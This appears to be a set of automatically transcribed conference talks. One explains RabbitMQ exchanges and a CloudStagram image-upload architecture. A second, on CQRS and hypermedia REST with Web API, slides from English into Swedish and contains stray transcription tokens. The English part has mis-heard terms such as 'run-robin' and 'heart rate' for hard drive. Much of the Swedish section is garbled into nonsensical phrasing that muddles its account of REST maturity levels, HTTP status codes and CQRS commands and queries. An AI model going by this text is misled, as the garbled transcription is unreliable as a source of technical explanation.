So how does actually this, how does RabbitMQ work? For that, I want to give you a small demo. I should have shown this slide, actually. And the demo is on the RabbitMQ simulator. So this is a tool I created also to explain how RabbitMQ works because I think showing static images is bad visualization or it didn't happen, basically. So in RabbitMQ, you want to have a producer of data and a consumer or any messaging app. You want to get your data from here to this point. To do that, you need an address. The address is the exchange. So what you do in RabbitMQ, you usually send messages to the exchange. You send the messages, nothing happens. Why? Because actually, you want to keep the messages in a queue. Soon we will see what the point of having this exchange in between. So if I click send now, I will get three messages there. Still nothing happens on the consumer side because I haven't subscribed the consumer to the queue. Once I subscribe it, you can see the, start getting the messages. Also at that point, the consumer was offline, let's say, and the messages still got queued because that's the whole point of having a queue. And if I add a new consumer, for example, RabbitMQ will do the run-robin for us. It's not exactly run-robin because if there is a consumer that finished before another one, that consumer will be ready. So actually, RabbitMQ will run-robin across consumers ready because there is no point of waiting for someone when it's actually processing stuff. I made this clear because we had this exact question like two weeks ago on the main list. So that's just how to get the data from one place to the other. And then if you add a new queue here, for example, and click send, you see the messages go to both queues. So what the exchange is doing is basically getting all the queues that are bound to the exchange, those blue circles, and then sending the message to each of them. Inside the server, there is no message copy. Also, that's a very common question and very important question because you want to know if RabbitMQ is just using your hard drive or memory for duplicating data. But Rabbit will keep only one copy of the message, but the metadata will say it lives in this queue, in that queue, and so on. But think about the exchange as when you have an inbox in email and you have rules. And I don't know, you get a message from your boss, goes to the trash, or somewhere there, close. And some other message from NDC Oslo, you will put it on the top and whatnot. So the message will go directly to the inbox, but they will end up in a separate folder. That's the first abstraction you get from the exchange. Besides that, there are three types of exchange, direct, fan out, and topic. And each of them implement a different routing algorithm. So basically, the exchange, depending on the type, will say, this is how I want to route messages. In this case, we have a direct exchange. So if I come here and set a routing key like Oslo, now I send a message. The message don't get there. The default routing key is the empty one. I'm showing here binding key because if I show something empty, we cannot see anything actually, but in fact, there is an empty routing key there. Now if I say Oslo and send, the message only goes there. So basically what the direct exchange is doing, this one, is to check the routing key or basically saying select queues from the queue table where routing key equals binding key, something like that. That's because routing queue doesn't use an SQL database below, basically. But that's the idea of the direct exchange. If the routing key doesn't match, it won't get the message. Then there is the fan out exchange, which doesn't take into account any routing key. So this is like a direct exchange where the routing key always matches, basically. There is actually no query on the routing key. So it just gives me all the bound queues to this exchange. And finally, we have the topic exchange, which is the most advanced one and the one where you can implement cooler things, I would say. So if I send now with the Oslo routing key, you can see that only this queue here got the messages. So that's just the direct exchange with a fancy name, maybe, I don't know. Not really. When I have a binding, let's say you have, let's say, a login example. You have a server, one, then application, one, module, one, and info. So let me maybe start again so it's easier to see it in action. So I have a queue here. I will change the binding key to that. And then I have a producer. And I send this. Nothing fancy. What we have here is words separated by adults. That's the whole thing. What happens if instead of sending messages from server one, let's say we are logging all the logs going centralized via rabbit, I start sending messages from my server two. It goes nowhere. Of course, we can create a queue, bind it, come here, put server two. But that's what we saw so far. I mean, there is nothing special. So here is where the patterns start to take place. So we can add a star or asterisk. So I change the queue name, not the binding key. This here, star, change. What did I do wrong? I don't know what happened. So the idea of the topic exchange is that you can have these patterns where you decide, OK, I don't want too much by this particular word. I want to have a star to match that word or not. Then if you have a hash, for example, you should match everything that's there. I don't know what's going on. Anyway, live demos, they never work. And the hash will match more, sorry, one word or more. So we have these patterns which were separated by dots. If we use the star, we can swap them for one word or if we have the hash for one word or more. Sorry for the broken demo. Anyway, so those are the three types of exchange we have. If I don't change the exchange type, it's difficult that this will work. That's the whole thing. There it goes. So it was me doing the wrong demo, basically. So let me show you one more time. Change that. And yeah, that queue will get the message. The other one get the message. Of course, you can mix and match all that. You don't care about the log level. So if I send here error, then it will go there and so on. And finally, yes, if you want to get every single log, you can set hash here or even like hash error. So you don't care about the modules, the application name or the server. There are all these things you can do with the topic exchange. So for logging, for example, you can have all these queues that you can see. They have an auto-generated name here. Those are options that AQP will provide you. If you don't really want to think about a new queue name because you just want to listen for the loss coming there, you can do that. And so on, there are way too many options. But you can say all errors, for example, and have this queue like that. Anyway, the whole message is you have producers. You have exchanges which are different routing algorithms. And at the end, you have consumers that will take the messages from the queues. In this particular case, RabbitMQ is very extensible. You can add your own exchange types. But you need to do that in Erlang. Your neighbors from Sweden, they know a lot about Erlang. I don't know, in Norway, because Erlang comes from Sweden. Anyway, enough talking. Any questions so far? No? Yes? Sorry? So the question is, if there is no subscription, what is going to happen to the message? So by subscription, you mean having the consumer or having the queue? So if you don't have a consumer, what happens is the messages start to get queued. Here your limit is the heart rate, basically. It's not memory bound. RabbitMQ has an algorithm that will try to keep as many messages as possible in memory. But at some point, you will raise a memory alarm, and then it will start patient up to disk. The idea is to try to not touch the heart rate. But at some point, you will. So if there is no subscription, you will get all the message queued. And you can reject messages from the consumer. You can acknowledge them. There are many things you can do there. So what's the architecture of this cluster? For the image upload, we have many users. They can even come from vServe from many app instances. So we can have many node.js servers running there. They all will send messages to the cluster.am upload exchange. So whenever there is a new image upload, it will be a new message there. Then there is a resize queue. This queue will have one, two, three, or whatever amount of resize you want to run. And the point is like cloud messaging. Did you put this on the title just to get us all in this room, or is there any cloud messaging here? In cloud, one important concept is to have elasticity. And competing consumers, that is the name of this messaging pattern, is just that. You can have one box with, let's say, 10 consumers. It will make sense to have probably some relation of your computer course with the consumer name or amount, sorry. But then you can have more boxes, and all of them have this consume from that particular queue. Also, with RabbitMQ, you can do higher availability. You can mirror queues or replicate the message content. Let's say across many servers. And this state will be known for all these queues. So what happened there? There is a new image event. So the resizer finished doing this resize, and it sent a message. Cluster RAM, new image. So now we have the actual resized image. So one consumer will grab the message, and we'll add this image to the user data in Redis. So that add image to user queue, we just have consumers getting this data, put it into Redis. New image queue will send this image to this offline. Everybody sees what's going on, at least in Redis. And image to follower queue will grab the message, and we'll send it to the followers, to the list of images for the follower. Remember that there was a list in Redis that kept all my images plus those of the people I follow. So there we do this other update. Another point that to take into account is that we have producers and consumers, they can live in the same process. Some people think that, okay, I have one process that is only producing, another is only consuming. That's not necessarily a requirement. Here for example, the resizer one is actually the same resizer that was there in yellow. So we have the same process, getting message, sending message. Just to make that clear. And finally, we have the add image to user consumer will broadcast a new message. Now the user has an image, okay, now we can broadcast to everyone that we have this new image. So JAS will grab this event and will send it via WebSocket to the uploader, also to the anonymous users and to the followers. So everybody will get this new image. So also here, it might seem like very simple, but imagine you have WebSocket server and you have all the sessions connected to that particular node JAS server. But then you add elasticity to the app and you fire more node JAS servers. So if I was connected on the first one and then you come later and load balance to, let's say, the server number two, you are not actually in this array and hash of the first server. I mean, the first server has no clue that you are there. So I can implement some complex replication algorithm I don't want to know about, or I can put a queue in between with Rabbit and then all this consumer will get it. If they know about this particular user in Sokshere S, I send the message. Else I don't care. So it's like duplicated effort, but it's a very simple way to broadcast this across all the app instances. So you need to decide what pattern you want to implement basically. So for node JAS, I created the most basic and ugly DSL to send the messages. So whenever you want to create a consumer, you define a variable, you specify the exchange name where you want to get the messages. You give a queue name, a routing key in case you need one, and the callback function. So this callback will get a message, the headers of the message, and some delivery information. And there you will put the callback code, like resizing the image, sending, putting something into Redis, whatever. The point here is that whenever you use Rabbit MQ, you will need to create a connection to the broker. You will need to open a channel. Rabbit MQ has an architecture or MQP of having many channels per connection. If you have a language that supports threads, or like Llang, or C Sharp, or Java, whatever, you want to have one channel per thread, for example. In PHP, this doesn't make any sense because there's only one thread. Anyway, you will need to open the connection, open the channel, declare the exchange, declare the queue, and do the binding all the time, probably. So if you don't want to do that, you probably want to implement a library, not like that one because that's probably the most ugly hack there. You maybe want to have a proper object-oriented thing that you pass all these parameters and give you back this thing, but you want to do something like that. Whenever there is a message, you call a callback. That's what you care. You don't care about the exchange. That's only a one-time decision, the same with the queue name and the routing key. What you care is just your callback code. And the cool part here is that if this callback code is much easier to test, for example, and to the couple, because it's only that what you need to call. So you have function that will get messages and produce something. It's very simple at the end of the day, the concept of messaging. And if you do not share this, you already know about all events and callbacks and whatnot. So it's not new. And then this library is called Samper. And it has a method called start consumers. And it will loop over all of them, all these consumers you pass, and will create a queue, and the exchange, do the binding, and so on. So if you want to see the code, it's there, Bitbucket. And my username and the name of the project is in Bitbucket because there is where people put stuff when they don't want anyone to see. If you want to make your code public, you send it to GitHub. Not necessarily because Bitbucket is wrong. Because in case of GitHub, I have many followers. And then people, as soon as I put something, they will probably follow it or whatever. And I don't want that. And yeah, that's why it's there. And if you see my user there, there's also the resizer for Clojure. So you can see both bits of the code. By the way, you asked the first question. What's your name? Sorry? What's your name? Do you want the book? Get it afterwards? I just forgot. Usually, whenever I have a book on hand, I give it to the first guy asking a question. So, oh, girl. Not necessarily a guy. Anyway. So maybe you want to see code before I get to the code of the talk. So let me get this here. So the app is a very basic express JS application in Node. It has all the beautiful callbacks and all the stuff people love in Node. And what I'm doing, basically, is to get in, like, setting the MongoDB connection, if this works, GraphicMQ connection, if this works, I start the consumers for the user modifiers and I start the reside consumers. And then set up the server. That's all we need to actually care. So whenever we get a new image, where is this? Yeah. TextMate has the fourth combination of keys for hiding the thing on the side. Anyway. So, this is the image upload. This will be the route call whenever there is a new upload, some sanitizing, whatever stuff there. And at some point, I do the storage on MongoDB and get the code back. And if this succeeds, I just create a JSON structure with a username, file name, comment if the user added a comment and the MIME type. And then, some per this mini DSL will publish a message to the classroom upload exchange with the JSON stuff we sent and no routing key. And make JSON image is just that. Just returns a user ID and so on. It's very simple. So I'm just passing JSON around, basically. So the next question then is to see who is actually bound to this exchange. So if I search, we have this resize consumer, has a callback, we'll get the message headers and the delivery info and it will read the image back from MongoDB based on the message file name. It will do the resize. And once it's finished, the resizing, it will send a new message called cluster and new image. And this thing is there. They add image to user consumer, just has a callback that calls a library, add image to user, user ID and so on. And this is just an abstraction over Redis. It just appends something to a list, basically. That's all there is to it. And if this works, then we can finally broadcast that we have a new image. That's it. Then there is also the new image consumer that will add the latest image to the user. Then another consumer will add the image to the followers and so on. If you are paying attention, you can see that I'm actually cheating here because I have all this code in the same Node.js process. You could take them apart and create one consumer for each task and then just start as many of them as you need. That will be the right thing to do. And then at the end of the, down there, I have this thing starting all the consumers. Then we have this broadcast. Let's see where this is called. So this will interact with the SoxS server, which is in this object called broadcast. And in this case, we'll send to the actual uploader as the image that there is a new image, basically. And to all the unknown users, it will also do a broadcast and the same for my own followers. And at some point, I start all those consumers. So that's basically what I'm doing there. If you want to see what's inside Thumper, I don't remember. But yeah, basically, I get the RabbitMQ connection. I set up what will be the consumer function for them. Yeah, this is the meat of everything. Whenever we store a callback, we basically get an exchange. Then we get a queue. Then we bind the queue. And then when there is the queue is actually bound, we subscribe for whatever callback function we pass there. So all this call, just because we want this function called whenever there is a new message. To avoid all that, I suggest that in every language that you use Rabbit, you want to have your own DSL, basically. And to send a message, we have the exchange name, message, and routing key here. And the same. We get the connection. We get the exchange. And we send the message there. Just to make this clear, you don't need to create the exchange all the time, or the queue, or the binding. You can have one cron shop that just runs once and sets up the whole topology, for example. Or you can do it all the time just to make sure that the stuff is there, depending the paranoia level, basically. And that's that. I mean, then somewhere I have the shock.soc.js code, which is this. It will keep a connection object. And whenever there is a broadcast, it will send it to the unknown client or to the user. There is a method to send to the user and another one to send to the unknown users. It's very basic code. I could try to see somebody magical uploaded an image. And if I look in, let me see. That's the real time. So that actual image, it can be a soc.js and WebSockets to the browser. And if anybody was actually following me and were on this page, they should get also this image popping up there, which if you have a lot of followers, will be probably the worst user experience I imagine. So anyway. So that's Cluster RAM. If you want to have any comments or whatever, you can send them to in this big bucket, probably open an issue or the know. At some point, I will take care of cleaning the code and putting it in GitHub. But anyway, code. Messaging. With messaging, we can scale, not necessarily scale up or horizontally. We can also scale to new requirements. We can have one code deployed there and then add new stuff without redeploying everything. We can change the technologies, swap the language. And if we don't need to have so many workers, we can also scale down. That's very important if you want to save money. Then you have all this decoupling. Yeah, in my example, I have all the code in the same Node.js project, but you can split it apart. And if you see on beat bucket, you will see the part that is actually now in Closure. And you have all this polyglot stuff that you don't need to care if you implement your own thing. You can talk from different protocols. For example, on the iPhone, the iOS chat from Facebook is using MQTT. It's a very good use case for this tiny protocol. And so on. It really depends where you are, what protocol you want to use, and RabbitMQ can offer all of those. And yeah, in the case of Cloud Foundry, you already have all this stuff there. So if you need to have elasticity, for example, in your cloud thing, you don't really need to think about how you will do all that. I remember back when I was working in Uruguay, we had an in-house made queue on top of my SQL. I mean, you don't want to know how to debug that and what happened when one consumer crashes and then did they consume the message yes or no and whatever. It's always polling the database every one second, every one minute, or every whatever, but it's always polling. It will not get the data in real time for some definition of real time as when RabbitMQ will push that and so on. And in the case of Cloud Foundry, it will do all the heavy lifting for you. It will maintain MongoDB, Redis, RabbitMQ, whatever service for you. It supports all these multi-applications per account, multiple services. And yeah, if you want, we can say we can do cloud messaging there. So thank you very much. Questions? There are no more books. Yes? Okay, let me see if you understand how you make this change redundant. That's the question. So RabbitMQ supports three ways of doing high availability. The most basic one is using L and clustering. That is, you can have many RabbitMQ brokers, even in separate machines, where the state is replicated all over. So this change will live in all these servers. That's the most basic one. If you care about the messages and the data, then you can use mirror queues. So when you declare the queue, you can tell Rabbit is a mirror queue. And there are many strategies on how many mirrors there are and how to choose the master, what happens if the master goes away, like new master election, all this stuff. But yeah, you can do this kind of replication. Then there is a plugin called Shovel that can also replicate messages across one, a web area network, and then there is a federation plugin, which also can do federation of queues and so on. So there are many options depending on what you want to do. For what I know, Instagram is using the mirror queues across many data centers in Amazon. That's what they do, but depends on the use case. And questions? Okay, thanks. And you have the book.
|
In this talk I'd like to present CloudStagram an Instagram clone prototype that has been built with "real time" features from the get go. New uploaded images are broadcasted for background processing using RabbitMQ from the node.js frontend to the Clojure backend. From there real time updates are pushed back to the node.js servers and then to the browser via sock.js. All this implemented in such a fashion that allows horizontal scalability of both the frontend app and the workers app with the requirement of deploying the app to a public Cloud. In this talk you will learn about the advantages of a message oriented architecture to be able to mash up together a polyglot system of apps and services.
|
10.5446/51535 (DOI)
|
Okay, let's get going. Hi everyone, welcome to this session on CQRS Hypermedia with WebAPI. It's a lot of buzzwords in that one, probably why I got accepted. Okay, what we're going to talk about today, first, a lot about me of course. Det är lite om resten och hypermedia, vad det är som betyder. Och en bit av CQRS, och hur vi kan kombinera de två. Jag ska visa lite demoar från en github-repository som du kan se om du vill. Så, hummaj, jag heter Anders<|sv|><|transcribe|><|sv|><|transcribe|><|sv|><|transcribe|><|sv|><|transcribe|><|sv|><|transcribe|> Jag är en arktist. Det är okej, det är en liten säsong. REST. Vad är REST? Kan du få det för mig? Nej, jag tror inte det. REST står för representational- och stödstöd. Det är en term som var kvar av en gädda som kallar REST. REST är ett stort stödstöd för representational- och stödstöd. REST är en gädda som kallar Roy Fielding i sin dissertation i 2000. Han kallar det en arkitekturallstid. Och faktiskt REST är bara i chapter 5 av sin dissertation. Han spender de första tre chaper som sker vad en arkitekturallstid är. Om du vill lägga det... Jag har försökt. Men det finns andra resorter där också. Så vad det faktiskt är? REST har varit utgång av många människor. Många människor är mycket smartare än jag är. Och det har varit diskussivt över och över och det är faktiskt lite bra diskussioner som kan vara hittat på ett jahu-grupp som REST diskusser. Det kan vara ganska hittat men det är fint att se. En gädda som försökte titta lite ner var Leonard Richardson. Han gjorde en tal på Q-Con 2008 och satt sig upp med en mål för att se hur en api är på en röstskal. Det är ofta en god modell att diskutera REST med den här rörelsen. Det ser ut som det här. Du har 4 eller faktiskt 3 länder. Lävel 0 på borten är det när du skriver HTP som transportprotokoll och sånt. Och så ställer laddaren till till hypermedia som är om du vill kalla dig REST det är där du har att vara. Vi ska se på olika länder. Det är där du bara brukar använda HTP som transportprotokoll. Det här är ditt SOAP, WCF-HTP bindings eller om du bara passer XML eller JSON-data med HTP men inget annat. Typisk scenariot kan se så här. Sämtligvis, men du har en api endpoint eller något. Du har en actionmetod som säger, kolla kastan och du passer till en JSON-data. Och serveret kommer att responda som något sånt. 200, okej. Det beror på att du har successivit att kolla den här kastan och du får tillbaka id. Och då måste du veta om jag vill få kalla det här kastan också kalla att få kastan på samma endpoint. Eller kanske vill jag sätta för kastan och du kan sätta ett kastanmätet. Så vi vill sätta för kastan namn John, men vi har ingen av dem. Så du får 200 okej, för transporten av messen är okej. Så det är okej. Men vi har inte hittat kastan, så success är falskt. Så på nästa länge jag hittar lite odd, att vara sannolikt. Men det är där du introducerar resorter. Så du kan tänka på det som du introducerar ganska bra kastan på topp av den tidigare länge. Så utan att posta till en api-endpoint och du säger kreatkastan så kan du posta till kastanmätet. På samma data får du samma resultat. Om du vill få kastan så postar du, men kanske när du tar id till urlösheten. Och du får kastanmätet. Jag ser inte många apis på den här länge. Det kanske är att jag har missunderstånd att ta med dig. Lävel 2. Det här är där det blir intressant. Så det är där du börjar använda HTTP för vad det är. I alla fall så du brukar använda HTTP-verb som att du får post, eller att du drar. Och du kan använda media-typer och kontentnegationer och du brukar använda HTTP error-messag. Så om du vill att krasa kastanmätet kanske du kan posta till apis eller kastanmätet. Du får tillbaka inte till 200 ok för det här har faktiskt krasat resorven och det finns en valgiv för det kring 201, krasat. Du får nog stort id. Och att få kastanmätet kanske du inte får postrequest för att få att använda getrequest för det. Och du får kastanmätet. Kanske vill du vara avdragare och försöka ta på patch-kvillen som inte är så oftast det är faktiskt att du säger att du vill att du vill öppna den här resorven men jag vill bara öppna den här delen. Så vi vill att vi vill att ta upp den här resorven kan respondera med att den här resorven är i använd. Så det finns en 409 konflikt. Så du ser att den här har faktiskt användits för HTTP-verk och error-messager för att de är bäst att använda. Och det är faktiskt jag skulle säga de mest apis som kallar sig rest enda upp på den här liten. Och mest apis kallar sig inte ännu ännu ännu. Det här är ganska bra. Det är intuitivt att använda och så länge de resorven är bäst det är ganska bra. Det är en problem då som gör att i några fall det är bättre att använda HTTP som sånt. För att man behöver mycket dokumentation att använda det. Man måste lägga för alla resorven, alla verkar man måste lägga hur man ska konstruera de messager och vad man ska göra. Och det finns några standarder att göra det som man inte har användat. Och det är där lvl 3 kommer in. Och det är att introducera hypermedia. Så hypermedia så vill du boka en trip med Ving.no Ska du gå till den här liten om du vill gå till den här resorven i Gran Canaria? Nej. Du går till den här liten och klicka själv och du kan inte hitta liten du kan sätta dina information de här passenger och så vidare. Och så kan du använda för API. Så om du har API och har liten så kan du sätta så behöver du inte så mycket dokumentation på den här API. Du måste ju ha en domain omgår. Du måste ju ha en trip eller en order. Men du behöver inte lägga om det som har att hända. Du behöver inte veta hur man konstruer url i systemet. Så det är en abbreviation som heter H2S jag vet inte hur man pratar det. Det heter hypermedia som en stadsäst. Så det är den här poängen. Ska du använda hypermedia som form och så om att kontrollera klienten som klienten har att gå through. Det är inte hämt SOA som jag trodde var första gången. Så let's se en exempel av hypermedia då. Vi är ju post till en customer till att skapa en customer. Vi får till 201 kring. Men vi måste inte få iden tillbaka för nu får vi en location av en customer som vi har just skapat. Det är en link som vi kan följa. Vi följer den linken och får tillbaka den hela customer som vi har just skapat. Det ser ut som tidigare. Men vi har additional links. Vi har en link till adressen av en customer och en list av ordning för den här customer. Och det är mycket mer än det vi har. Så let's look at some code. Hur gör du det? Först går vi det här simpla, lätt, lätt, lätt, lätt, lätt, lätt. Hur många av dig har jobbat med, eller vet på webb-API? Awesome. Så jag har ingen basics på webb-API. I wasn't going to soon. So in webb API. You instead of as in a normal ASP net MVC application, where you derive from controller controller, you derive from API controller instead. And instead of having action methods called. The ball, like the last part of the URI, you use the HTTP verbs, smeternames. So for creating a customer, we have a post. We get the customer. This is going to be model bound. So if you pass Jason object, we'll get back to the customer. So we save it and we can create a response. So instead of simply returning information, we can create a response and we can say that. Okay, I want this to be a two one created and I want to set the location to this link. And if we get that customer, follow this link, we end up here. So we return the customer, but we also return a list of links. Now, obviously this doesn't really scale that well. If you have a lot of resources, perhaps you need to return customers from many different views, but you don't want to repeat all this creating links in every single method. And there are, of course, a number of ways to refaktor this, you can use base classes with hyperlinks and so on. I want to go into details from this specific case, but we'll look at another way of doing it later on. But this really is all you have to do to be hyper media compliant or whatever you want to call it. By the way, anyone have questions just raise your hand and I'll try to answer. So there are quite a few different ways of returning links and returning hyper media. So the one we saw here is basically rolling your own. So we create our own model and that's fine. That's often a good way of doing it. It can be nice to keep some of the conventions so that links are named using the name rel. So rel is could be there. If you are standardized, you can have rel of parent, rel of children and so on. But you can also have your own custom rels, so rel of order, perhaps. But there are other versions of hyper media. You could actually use atom or atom pub. That's a great format for returning links and templates and so on. There's a lot of XML. So some people may not like that. But it's very useful. It has support for most things you need. En annan version could be to use XHTML, or well HTML, but XHTML is easier to parse. So instead of the entry and title, you can have divs or spans and you give them a class to let the client know what content this is. There's an upside to that. You can actually browse your API using any web browser. And that could be really useful. You don't have to create a separate API browser project to just have a look at what the API has. On the other hand, HTML is not really meant to transfer data in that form. En annan mång, om du vill vara lite mer hipster och du äter angelbacker, kan du ta upp de med köljbränsle. Det är mycket bättre. Det är en format som heter Hypertext Application Language, or HAL, som jag verkligen tycker är lätt att se. Det är lätt att ha, om du är en javascript klient. Men det är andra följer. Jag är faktiskt mig själv, med kollektioner och JSON. Det är lite mer förbundet. Det har support för allt att atompubb har. Så vi ska dra in lite mer på kollektioner och JSON. Så det är atompubb, men i JSON. Du har support för kollektioner, obviously. Längd, square templates och också rätt templates. Du kan säga att det är en order och om du vill posta det, fylla ut den här templateen. Det är en liten person som heter Mike Arminson, som också hittar de här tingarna. Vi ser några exempel. Det är en item i kollektioner och JSON. Vi har även om du bara rådde en item, det finns alltid en items array. I each item har data, en href, som är url till det här particular item. Det är en namn-väljukollektion. Och of course, each item has links as well. Det är support för queries. Så vi kan säga att om du vill query den här kollektioner, du kan använda den search query. Och som jag sa, det är en template. Om du vill creera en ny item i den här kollektioner, fylla ut den här templateen och posta hela templateen till kollektionerna. Så att göra det i webbappier, av dig själv, är inte något jag skulle öppna, för det är mycket kod. Fortunatllig Glendblock, att Microsoft, har gjort det som enligt, lätt, och enligt, förmattare för webbappier. Det hjälper dig att göra det. Jag trodde att vi skulle ta en snabbt klipp på det. Så om du, specifiktvis, om du bara behöver använda krodd, så är det en bra projekt. Du kan bara dricka från den nya kollektionen, JSON-kontroller, och säga att jag vill förbättra kollektioner av den här, i den här caset, kvind. Så det är en kollektion av kvind. Du bara drickar, överrider, sker, läser, uppdater, lättmetoder. Och för kontrollern att kolla hur man får formatera den här kvind, implementerar du en läser och en skäljare. Så en skäljare implementerar en simpla interface som tar en kollektion av en modellobjekt och tar den till en kollektion-Jason-kontroller. Nu kan du göra det här. Det är mycket kod. Du kan kvindera det mycket av att använda nåt som en reflektion för att refleka över alla propiet på din objekt. Jag har gjort det i några cas. Så det här hjälper dig att få dig en korrekt kollektion-Jason-kontroller. Så det är bra för kvind. Det tar oss till denna del. Det är lite av ett tangent, men jag tror att det är viktigt att ta lite om att skapa ditt resurs. Resursdesign är allt om att förstå vad du vill i din system. Vilka verb du ska använda på ditt url? Vad att sända tillbaka och så vidare. Det som du brukar se när du ser exempel är att du bara skapar ditt domainobjekt som resurser. Om du har en ordning, skapar du en ordningresurs. Du kan skapa en ordning med just id. Du kan skapa ditt itemskollektion. Om du vill veta skapingstaterna av den ordningen, skapar du skapingstaterna av det. Det är sånt som det är. Men det här brukar vara ditt omkring i världen. Det är bra för denna del, men om du är på bäcken och är på skapingdepartement och vill uppdatera skapingstaterna för den ordningen, vill du skapa eller skapa det till skapingstaterna. Om du skapar ditt ordningresurser i den komponenten, vill du skapa ditt ordningresurs. Men du vill inte skapa ditt end-userare eller skapingstaterna eller skapa till skapingstaterna. Alltid har du samma url, samma resurs, men du har helt olika passager i ditt kod. Det kan vara ett problem. Du måste ha authorisation på skapingstaterna, men inte på skapingstaterna. Du behöver helt olika skapingstater. Om du skapar en ordning och är en administratör, vill du ha en link till skapingstaterna. Men om du är en kunder, vill du inte ha en link. Det du kan göra är att du kan göra vad vi gör på webb. Vi brukar använda url och resurser som är förutsättade i utgångsfästningar. Om du är en kunder, om du vill skapa en ordning, så kan du skapa en ordning i tiden. Du kan skapa en ordning och posta till den. Om du vill skapa skapingstaterna, går du till min ordning, hittar du ordning och skapar skapingstaterna. Om du är på skapingstaterna, har du helt olika passager. Det är helt separat resurser att använda. Okej, så det är rest. Om jag har en http-kunder, där jag tar ordning, men om du behöver en avslutning eller en händer eller sånt. Om du inte har nämnt på hypermedia, RFC 5988, är det något du inte prefererar att använda? Jag är inte familiar med det. Är det webblänking som är i hypermedia? Ja, som jag sa, det finns olika olika månader i hypermedia. Jag har inte anstått det. Jag har tyst att jag har råd mig eller att jag har skapat passager. Ja. Först har vi det, det är inte så bra att använda. Ja. Okej, så jag skapar rådning. Ja, exakt. Jag skapar rådning i första... Ja. I första kursen, i domenskärverkning, är det lätt att skapa rådning i webbapp. Ja, definitivt. Det är en avsäkringar du måste göra. På andra kursen, i första kursen har du mycket problem med saker som avslutning och så vidare. Jag prefererar det. Men det är en problem med webbapp. Det gör det lite svårt att skapa rådning. Okej, vi går vidare. Så det nästa är om CQRS. Så, en liten show av händer. Hur många vet vad CQRS är? Sådär. Okej, ganska mycket. Håll de händerna upp. Hur många av dig gillar CQRS? Ja, bra. Hur många av dig har faktiskt stått ett system med CQRS? Okej, så de som skapar händerna upp. Kanske kommer jag tillbaka. Och om jobb. För att vi är hundra. Okej, så CQRS. Jag kommer inte tillbaka till detaljer på bakgrunden av CQRS. Men den generella konceptet är att du vill separera hur du lägger från hur du skapar. Och det är många som skapar. Men en viktig sak är att mest system har mycket lägg och ganska många skapar. Men vad vi optimiserar för? Vi optimiserar ofta för att skapa. Vi normaliserar våra databaser för att först och förallt, naturligtvis, skapar är superäppigt. Det är inte ännu mer, men det brukar vara. Men vi vill ha skapar för att bli väldigt snabbt. Vi gör nog många mer lägg. Så det är något som CQRS försöker lösa. Och vi gör det med en normaliserad sida. Possiblellt även eventsourced. Och det är något jag inte kommer till detaljer på. Men vi har också en lägg sida där vi normaliserar våra databaser. Så det är lätt och snabbt att lägga. Jag ska fokusera på den fronten av den här. Så den rätt sida på den här bilden. Så servicen för CQRS. Och de tenden att vara divide till två saker. Du har dina kommandor för att skapa. En kommand kan bara passdata till systemet, om du inte får nåt tillbaka. Och du har kvarens för att lägga. Och kvarens är bara för att få data. Det är inte för att uppdraga nåt i systemet. Typiska kommandor kan bli så. Jag kan skapa en kvarenskommand. En add item to order command. Och kanske ett sett customer address command. Men det är en issue med det här. I CQRS prefererar du om kommandet faktiskt att skapa intenten av användaren. Så sett customer address inte riktigt beror på varför vi vill sätta det. Var det ett nytt andres? Var det kvarenskommand eller var vi att skapa en missdel? Den senaste gången. Så vi vill nog inte ha något sådant. Du har en korrekt kvarenskommand att skapa missdelar på adresset. Och du har en kvarenskommand. Där vi beror på systemet att det här kvarenskommand har en helt annor kvarenskommand. Så kanske vi vill sätta våra saker till ett olika kvarenskommand. Så. Säger du vad det är? Ja, det är mer som en avdrag faktiskt. Nämligen är det bäst på det. Det är en bra siffra. Så sätta en kvarenskommand. Okej. Så på renskommandet är det ganska lätt. Vi har en modell som vi har skapat. Så en ordning kan se ut som en denormad ordning. Du kan ha djurställningar där. Och kanske du har en list av ordning av kvarenskommand. Så du kan ha många olika visar av samma data. Och de kan alla vara stort som det är i databas. Så, några propiet om CQRS. Det är också en avdragning. Så när du skapar en kvarenskommand. Om du gör en liten ljud eftermiddag. Du kanske inte ser ut förändringar. För att en kvarenskommand är asynkroniskt och något sker på bäcken. Modeller är uppdragna och så kan du få den nya data. Och det är inte en rekistespons. Så det är inte... Förlåt så, förutvisst. Men inte för kvarenskommand. Och... Även mer viktigast. Du aldrig har aldrig skapat samma modell. Så din... Sätt kvarenskommand och din kvarenskommand är ganska olika. Så hur kan det förändras till rest? Och hur kan vi få det bästa av båda världs? Jag ska visa er två olika månader. Den första är som är nästan vad en restpjurist kanske gillar. Och den andra är nästan vad en seekjurist, kanske gillar. Du kan choosea, picka och choosea. Så den första är det som du bara hide att det är en seekjurist solution. Du kan skapa en order-kollektion och det får du från den order-modellen du har. Obvistligen måste du lägga lite länkar till det. Om du vill order-kollektion med en kvarenskommand, du får kvarenskommand och idén. Det här är perfekt för rest. Det är en bra fitt för en seekjurist också. En kvarenskommand är siffra. Du ska kunna issuea det många gånger utan att skapa nåt. Och det samme går för seekjurist-kvarenskommand. De är säker. De är inte siffra att uppdragna nåt. Det här är en bra fitt. På den här siffrorna vill du uppdragna. Det här blir lite trickigare. Räst vill du usually use the same read-modell as a write-modell on your resources. Om du vill göra en order kan du posta till order-kommandet. Om du vill uppdragna den adressen, så har vi två olika kvarenskommand. Vi kan ta nåt som vi kan ta till adressen. Vi kan ta det som vi kan uppdragna en resurs eller ta en resurs på en specifik position. Det här är det vi hade. Om vi hade en resurs eller en adress, så kan vi ha det. Om vi vill ta en resurs, så kan vi posta till en annan resurs. Det här är en aktien. Den har faktiskt stort stort. Ska en seekjurist vara asynkronisk, vill vi inte ta en 201-kvarenskommand eller 200OK. Vi vill ha en 202-kvarenskommand. Det betyder att jag har det här. Jag tror att det är okej. Jag kan ge dig den lokationen om jag vet det. Men jag ska inte säkera att om du får den här lokationen, så har vi något. Men det är det vi ska ha där. Så det är ett tuevitt, det är det vi har. Vi ska se om det är en kvarenskommand igen. Det här är ett samtidigt samtidigt som jag har skett. Jag vill göra det här, annars vill du inte säga det. Jag ska ta den. Jag tror att jag ska ta den och lägga dig se den. Det här är en enkel seekjurist solutions med ViewModels och allt som är asynkronisk. Det är Gregiens eventstor på bakgrunden. Det är masstransit som sätter messager tillbaka. Men vi ska ta på renskjuten. Har du brådgivit Fiddler? Fiddler är en necessarerat tuevist om du vill göra något sånt. Jag ska refresha den här sidan. Jag har stålats lite data från vår textfreestor. Jag hoppas att ingen har minskat. Vi kan navigera det här. Vi kan gå in till Sweets, Lyckris, Winegums och gå till produkter. Vad har hänt? Vi har en API här. Om vi går till API-stadsarens, får vi tillbaka något som ser 